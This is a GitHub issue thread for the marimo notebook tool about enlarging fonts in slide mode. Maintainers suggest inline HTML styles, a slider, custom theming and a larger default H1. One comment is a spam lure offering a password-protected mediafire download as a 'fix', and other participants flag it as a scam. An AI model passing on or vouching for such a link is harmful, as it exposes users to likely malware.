### ISSUE TITLE
Font enlargement

### ISSUE THREAD

**Issue by TimWalter** [marimo-team/marimo#2125]
### Description

Hey, I am enjoying the possibility to use marimo notebooks to combine code to have live presentations using the slide or grid mode. However, one really problematic thing in my opinion is that even on the largest font e.g. markdown # or html h1 the font remains too small for presentations.

e.g.
![image](https://github.com/user-attachments/assets/9ce7d152-8be0-432c-829f-24e593ef3e81)

This is just too small for a full screen presentation.

### Suggested solution

Since there is plenty of room at the bottom either increase the font size by default, such that smaller markdown headings etc. become more useful or add a parameter to edit.

### Alternative

Using mermaid one can specify a Font size and cheat the system a bit e.g.
test = '''
%%{init: {'themeVariables': { 'fontSize': '50px'}}}%%
graph TD
    A["Demo"]
    '''
mo.mermaid(test)

But that is not a proper replacement.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by TimWalter** [comment]
Would you like my credit card number and password along with it?

**Comment by metaboulie** [comment]
@TimWalter Hey, maybe you can try this 
```html
mo.md("""<h1 style="font-size: 120px;">Continuous Meeting Presentation</h1>""")
```
and alter the value of the font-size

You can also make a slider 

```python
slider = mo.ui.slider(
    30, 120, 5, label="Control the font size", show_value=True, value=50
)
```

and control the font size with this slider

```python
mo.md(
    f"""
    <h1 style="font-size: {slider.value}px;">Continuous Meeting Presentation</h1>
    {slider}
    """
)
```

**Comment by akshayka** [comment]
> Would you like my credit card number and password along with it?
> 
> [I think you have scammers around:/]

:( Sorry about that. I saw a scammer/bot yesterday.

**Comment by mscolnick** [comment]
@TimWalter - we've added support for custom theming (https://docs.marimo.io/guides/theming.html).  With this you can change the h1/h2 tags if you'd like.

If you want to change all markdown elements in lockstep - i am thinking of adding an app-config options for `text_size`. This would be t-shirt sizes instead of actual numbers since we want to increase headings and text with different elements.

Config | paragraph font size
-- | --
sm | 0.875rem (14px)
base (default) | 1rem (16px)
lg | 1.125rem (18px)
xl | 1.25rem (20px)
2xl | 1.5rem (24px)


Let me know if that is preferable

**Comment by TimWalter** [comment]
Hey sounds cool! Of course adding custom CSS support could be very powerful for all things HTML but for markdown (which is just quicker to edit and has different use-cases IMO) I like your proposed idea

**Comment by mscolnick** [comment]
@TimWalter , @alefminus , do you think this can be closed by #2247?

I add automatic font enlargement for slides. But i dont know if we need the additional custom enlargement settings I mentioned above

**Comment by TimWalter** [comment]
I think it's definitely better and workable.

 However, in my opinion for some use cases the maximum font size is still too small.

**Comment by mscolnick** [comment]
@TimWalter  could you describe your use case? Or screenshots?

**Comment by TimWalter** [comment]
![image](https://github.com/user-attachments/assets/313ac0fe-903b-4241-8c69-ee0bbdf610ae)
 Let's say this is your entry slide than that is pretty small still I'd say and this is the largest size

**Comment by mscolnick** [comment]
@TimWalter that font-size is 70px, which I found online as the default H1 for pptx.

I will increase this to 80px to make it larger by default (#2411). If you need further customization, I would recommend to do use HTML styles in markdown.

<img width="824" alt="image" src="https://github.com/user-attachments/assets/622e51b3-fe68-4021-b657-096b5df99f23">
